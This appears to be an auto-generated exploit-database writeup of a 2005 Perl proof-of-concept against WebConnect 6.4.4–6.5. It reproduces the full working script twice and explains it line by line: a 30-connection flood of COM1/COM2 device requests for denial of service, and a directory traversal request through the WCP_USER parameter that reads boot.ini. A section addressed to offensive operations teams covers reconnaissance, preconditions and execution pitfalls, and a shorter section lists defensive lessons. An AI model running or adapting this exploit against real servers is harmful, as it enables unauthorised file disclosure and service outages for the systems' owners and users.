By exploitdb papers bot•February 24, 2005•

papers

Exploiting WebConnect 6.4.4 - 6.5: Directory Traversal and DoS

What this paper is

This paper, published in 2005 by karak0rsan, describes a proof-of-concept exploit for WebConnect versions 6.4.4 through 6.5. The exploit targets two vulnerabilities: a directory traversal flaw and a denial-of-service (DoS) condition. The provided Perl script demonstrates how to trigger these vulnerabilities.

Simple technical breakdown

The exploit works by sending specially crafted HTTP requests to the vulnerable WebConnect server.

Directory Traversal: The script attempts to access sensitive files on the server by using the ..//..//..//..//..//boot.ini path in a GET request. This technique, known as directory traversal (or path traversal), aims to trick the server into reading files outside of its intended web root directory. In this case, it targets boot.ini, a critical system file on Windows.
Denial of Service (DoS): The script also bombards the server with a large number of simultaneous TCP connections and requests for non-existent or potentially resource-intensive files (like COM1, COM2, COM1.jsp, etc.). This rapid, repeated connection and request flooding can overwhelm the server's resources, preventing legitimate users from accessing it.

Complete code and payload walkthrough

The provided Perl script is relatively short and straightforward. Let's break it down piece by piece.

#WebConnect version 6.4.4 - 6.5 Proof of Concept
#Coded bY ++Karak0rsan++
#karakorsankara@hotmail.com
#Usage:perl webconnect.pl [target] [port] (Default port: 2080)
#Greetz:hurby,phalaposher,r3d_b4r0n,L4M3R,zeronc,Atak,sloan,emre,
#fox and all my friends
#Konak Anatolian High School - Prep/C Class
#Sen kendini biliyosun,attigin kaziklari unutmuycam artýk okulda
#yuzume de bakamiyosun.Masum suratina,gozlerine ALDANMISIM!
#Herseyi sen baslattin sen bitirdin unutma;SENIN BENI BITIRDIGIN
#YERDE SENDE BENIM ICIN BITERSIN!!!

Header Comments: These lines are comments. They provide information about the script's purpose, author, usage instructions, and personal messages. They do not affect the script's execution.

$host=$ARGV[0];
$port=$ARGV[1];

$host = $ARGV[0];: This line assigns the first command-line argument provided to the script to the variable $host. This argument is expected to be the target IP address or hostname.
$port = $ARGV[1];: This line assigns the second command-line argument to the variable $port. This argument is expected to be the target port.

if(!$ARGV[1]){
print "WebConnect 6.4.4 - 6.5 Proof of Concept\n";
print "Coded by ++Karak0rsan++\n";
print "Usage:perl $0 [target] [port]\n";
}

Usage Check: This if block checks if the second command-line argument ($ARGV[1], which is the port) is missing.
- If the port is missing, it prints a usage message indicating how to run the script correctly, including the target and port. $0 refers to the name of the script itself.

use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, );
close($socket);
if($socket){
print "[+]Attacking...!\n";
print "[+]Allah Allah edalariyla saldiriyoz cunku biz muslumaniz:)\n";
}

use IO::Socket;: This line imports the IO::Socket module, which is necessary for network socket operations in Perl.
$socket = new IO::Socket::INET(...): This attempts to create a new TCP socket connection to the target host and port specified by $host and $port.
- PeerAddr => $host: Specifies the remote host.
- PeerPort => $port: Specifies the remote port.
- Proto => 'tcp': Specifies the TCP protocol.
- Type => SOCK_STREAM: Specifies a stream socket (TCP).
close($socket);: This line immediately closes the socket connection that was just established. This initial connection attempt seems to be a check to see if the target is alive and listening on the specified port.
if($socket): This checks if the $socket object was successfully created (meaning a connection was likely established, even if immediately closed).
- If true, it prints an "Attacking...!" message and a culturally specific message. This block is primarily for user feedback.

use IO::Socket;
for($i= 0; $i < 30; $i++)
{
$socket1 = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, ) or die "Didnt Connect,Enter target address!\n";
print $socket1 "GET /COM1 HTTP/1.0\r\n";
print $socket1 "GET /COM2 HTTP/1.0\r\n";
print $socket1 "GET /COM1.jsp HTTP/1.0\r\n";
print $socket1 "GET /COM1.html HTTP/1.0\r\n";
print $socket1 "GET /COM1.smurf HTTP/1.0\r\n";
close($socket1);
}

for($i= 0; $i < 30; $i++): This loop iterates 30 times. This is the core of the DoS attack.
$socket1 = new IO::Socket::INET(...) or die ...: Inside the loop, a new TCP socket connection is established to the target for each iteration. If a connection fails, the script terminates with an error message.
print $socket1 "GET /COM1 HTTP/1.0\r\n";: This sends an HTTP GET request for the resource /COM1. The \r\n signifies the end of a line in HTTP.
print $socket1 "GET /COM2 HTTP/1.0\r\n";: Sends a GET request for /COM2.
print $socket1 "GET /COM1.jsp HTTP/1.0\r\n";: Sends a GET request for /COM1.jsp.
print $socket1 "GET /COM1.html HTTP/1.0\r\n";: Sends a GET request for /COM1.html.
print $socket1 "GET /COM1.smurf HTTP/1.0\r\n";: Sends a GET request for /COM1.smurf.
- Purpose of these requests: These requests are designed to be somewhat arbitrary and potentially resource-intensive. Accessing devices like COM1 or COM2 directly via HTTP is unusual and might trigger specific handling routines within the WebConnect server that could be inefficient or prone to errors. The .jsp and .html extensions suggest attempts to access dynamic or static web content, but the path /COM1 is the key. The .smurf extension is also unusual and might be an attempt to trigger a specific, possibly vulnerable, handler. The repetition of these requests across 30 connections aims to exhaust server resources like open file handles, memory, or CPU cycles.
close($socket1);: Each socket connection is closed after sending the requests. This rapid opening and closing of connections, combined with the requests, contributes to the DoS.

$socket2 = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, );
print $socket2 "GET 
/jretest.html?lang=&parms=default&WCP_USER=..//..//..//..//..//boot.ini&action= 
HTTP/1.0\r\n";
close($socket2);

$socket2 = new IO::Socket::INET(...): A new TCP socket connection is established. This connection is used for the directory traversal exploit.
print $socket2 "GET /jretest.html?lang=&parms=default&WCP_USER=..//..//..//..//..//boot.ini&action= HTTP/1.0\r\n";: This is the crucial line for the directory traversal.
- GET /jretest.html?lang=&parms=default&WCP_USER=..//..//..//..//..//boot.ini&action= HTTP/1.0\r\n: This sends an HTTP GET request.
  - /jretest.html: This appears to be a legitimate-looking resource path.
  - ?lang=&parms=default&WCP_USER=..//..//..//..//..//boot.ini&action=: This is the query string.
    - WCP_USER=..//..//..//..//..//boot.ini: This is the payload for directory traversal. The sequence ..// is used to navigate up the directory tree. By repeating it five times, the script attempts to move five levels up from the server's expected web root. The goal is to reach the root directory (/) and then access boot.ini, which is a critical system configuration file on Windows systems. The double slash // might be used as an alternative path separator or to bypass simple sanitization.
    - lang=, parms=default, action=: These are other parameters that might be expected by the jretest.html script or handler. They are likely included to make the request appear more complete or to satisfy any parsing logic.
close($socket2);: The socket is closed after sending the request.

print "Attack finished ;)\n";
exit();

# milw0rm.com [2005-02-24]

print "Attack finished ;)\n";: Prints a final message indicating the script has completed its execution.
exit();: Exits the Perl script.
# milw0rm.com [2005-02-24]: A comment indicating the source and publication date of the exploit.

Code Fragment/Block -> Practical Purpose Mapping:

$host=$ARGV[0]; $port=$ARGV[1];: Capturing target IP/hostname and port from command line.
if(!$ARGV[1]){ ... }: Displaying usage instructions if port is missing.
use IO::Socket;: Importing network socket library.
new IO::Socket::INET(...): Establishing a TCP connection to the target.
close($socket);: Closing a socket connection.
if($socket){ print "[+]Attacking...!\n"; ... }: Initial connection check and user feedback.
for($i= 0; $i < 30; $i++) { ... }: Loop for DoS attack (30 iterations).
print $socket1 "GET /COM1 HTTP/1.0\r\n"; (and similar for COM2, COM1.jsp, etc.): Sending HTTP GET requests to potentially overload the server with unusual resource requests.
print $socket2 "GET /jretest.html?lang=&parms=default&WCP_USER=..//..//..//..//..//boot.ini&action= HTTP/1.0\r\n";: Sending a crafted HTTP GET request to exploit directory traversal.
print "Attack finished ;)\n"; exit();: Script completion message and exit.

Shellcode/Payload Segments:

This script does not contain traditional shellcode bytes. Instead, the "payload" is embedded within the HTTP requests themselves:

DoS Payload: The repeated requests for /COM1, /COM2, etc., within a loop of 30 connections. This is a form of resource exhaustion payload.
Directory Traversal Payload: The string ..//..//..//..//..//boot.ini within the WCP_USER parameter of the GET request. This is the malicious input designed to manipulate the server's file access.

Practical details for offensive operations teams

Required Access Level: Network access to the target host and port is required. No prior authentication or local access is needed for this exploit.
Lab Preconditions:
- A target system running WebConnect versions 6.4.4 to 6.5.
- The target system must be accessible over the network on the specified port (default 2080).
- A Perl interpreter installed on the attacker's machine.
- The IO::Socket module must be available in the Perl environment.
Tooling Assumptions:
- Perl: The exploit is written in Perl.
- Network Connectivity: Standard TCP/IP networking.
Execution Pitfalls:
- Target Version: The exploit is specific to WebConnect 6.4.4 and 6.5. Newer versions or different web servers will not be vulnerable.
- Firewalls/IPS: Network firewalls or Intrusion Prevention Systems (IPS) might detect and block the rapid connection attempts or the suspicious directory traversal pattern.
- Server Configuration: The server might have specific configurations that prevent directory traversal (e.g., strict path sanitization) or mitigate DoS attacks (e.g., connection limits, rate limiting).
- Operating System: The directory traversal payload boot.ini is specific to Windows systems. If the target is Linux or another OS, this specific file access will fail, though the traversal technique might still work for other sensitive files.
- Port: The default port is 2080. If WebConnect is running on a different port, it must be specified.
- Script Errors: Incorrect command-line arguments or network issues could cause the Perl script to fail.
Tradecraft Considerations:
- Reconnaissance: Confirming the WebConnect version is critical before attempting this exploit. Banner grabbing or other reconnaissance techniques can help identify the server and version.
- Stealth: This exploit is inherently noisy due to the DoS component. It is unlikely to be stealthy. For authorized operations, this would typically be used in a controlled environment or during specific phases where disruption is acceptable or intended.
- Payload Delivery: The directory traversal part of the exploit doesn't deliver a traditional shellcode. It aims to read a file. To gain further access, an attacker would need to combine this with other vulnerabilities or techniques if boot.ini itself doesn't grant direct execution capabilities (which it typically doesn't). However, reading boot.ini can reveal sensitive system information that aids further attacks.
- Testing: Always test in a lab environment first.

Where this was used and when

Context: This exploit was published in 2005. It targets a specific vulnerability in older versions of WebConnect.
Usage: Proof-of-concept exploits like this are typically used by security researchers to demonstrate vulnerabilities and by attackers to exploit known weaknesses. Given its age, it's unlikely to be effective against modern, patched systems. Its primary use would have been against unpatched WebConnect installations in the mid-2000s.

Defensive lessons for modern teams

Patch Management: The most crucial lesson is the importance of timely patching. This vulnerability was known and exploitable in 2005. Keeping software updated is paramount.
Input Validation and Sanitization: Web applications must rigorously validate and sanitize all user-supplied input, especially in URL parameters and paths. This includes preventing directory traversal sequences (../, ..\\, etc.) and handling unusual characters or encodings.
Principle of Least Privilege: Web servers and applications should run with the minimum necessary privileges. This limits the damage an attacker can do even if they successfully traverse directories. Accessing sensitive system files like boot.ini should not be possible for a web application.
Network Segmentation and Firewalls: Restricting access to web servers from only necessary internal or external networks can limit the attack surface.
Intrusion Detection/Prevention Systems (IDS/IPS): Modern IDS/IPS can detect patterns indicative of directory traversal attempts and DoS attacks, blocking them before they reach the vulnerable service.
Web Application Firewalls (WAFs): WAFs are specifically designed to protect web applications by filtering malicious HTTP traffic, including common exploit patterns like directory traversal.
Resource Limiting: Implementing rate limiting on incoming connections and requests, as well as setting resource limits for processes, can help mitigate DoS attacks.

ASCII visual (if applicable)

This exploit involves direct network communication and file access manipulation. A simple flow diagram can illustrate the exploit's logic.

+-----------------+      +-----------------+      +-----------------+
| Attacker's      |----->| Network         |----->| Target Web      |
| Perl Script     |      | (Internet/LAN)  |      | Connect Server  |
+-----------------+      +-----------------+      +-----------------+
       |                                                 ^
       | 1. Establish TCP Connection                     |
       | 2. Send DoS requests (e.g., GET /COM1)          |
       |    (Repeatedly, 30 times)                       |
       | 3. Establish new TCP Connection                 |
       | 4. Send Directory Traversal request             |
       |    (e.g., GET /jretest.html?WCP_USER=../..//..//..//..//boot.ini) |
       | 5. Close TCP Connection                         |
       |                                                 |
       +-------------------------------------------------+
                           |
                           v
              +--------------------------+
              | Server attempts to read  |
              | boot.ini (or fails)      |
              +--------------------------+
              (Potential DoS if overwhelmed)

Source references

Paper URL: https://www.exploit-db.com/papers/838
Raw Exploit URL: https://www.exploit-db.com/raw/838
Author: karak0rsan
Published: 2005-02-24

Original Exploit-DB Content (Verbatim)

#WebConnect version 6.4.4 - 6.5 Proof of Concept
#Coded bY ++Karak0rsan++
#karakorsankara@hotmail.com
#Usage:perl webconnect.pl [target] [port] (Default port: 2080)
#Greetz:hurby,phalaposher,r3d_b4r0n,L4M3R,zeronc,Atak,sloan,emre,
#fox and all my friends
#Konak Anatolian High School - Prep/C Class
#Sen kendini biliyosun,attigin kaziklari unutmuycam artýk okulda
#yuzume de bakamiyosun.Masum suratina,gozlerine ALDANMISIM!
#Herseyi sen baslattin sen bitirdin unutma;SENIN BENI BITIRDIGIN
#YERDE SENDE BENIM ICIN BITERSIN!!!

$host=$ARGV[0];
$port=$ARGV[1];

if(!$ARGV[1]){
print "WebConnect 6.4.4 - 6.5 Proof of Concept\n";
print "Coded by ++Karak0rsan++\n";
print "Usage:perl $0 [target] [port]\n";
}


use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, );
close($socket);
if($socket){
print "[+]Attacking...!\n";
print "[+]Allah Allah edalariyla saldiriyoz cunku biz muslumaniz:)\n";
}

use IO::Socket;
for($i= 0; $i < 30; $i++)
{
$socket1 = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, ) or die "Didnt Connect,Enter target address!\n";
print $socket1 "GET /COM1 HTTP/1.0\r\n";
print $socket1 "GET /COM2 HTTP/1.0\r\n";
print $socket1 "GET /COM1.jsp HTTP/1.0\r\n";
print $socket1 "GET /COM1.html HTTP/1.0\r\n";
print $socket1 "GET /COM1.smurf HTTP/1.0\r\n";
close($socket1);
}
$socket2 = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, );
print $socket2 "GET 
/jretest.html?lang=&parms=default&WCP_USER=..//..//..//..//..//boot.ini&action= 
HTTP/1.0\r\n";
close($socket2);
print "Attack finished ;)\n";
exit();

# milw0rm.com [2005-02-24]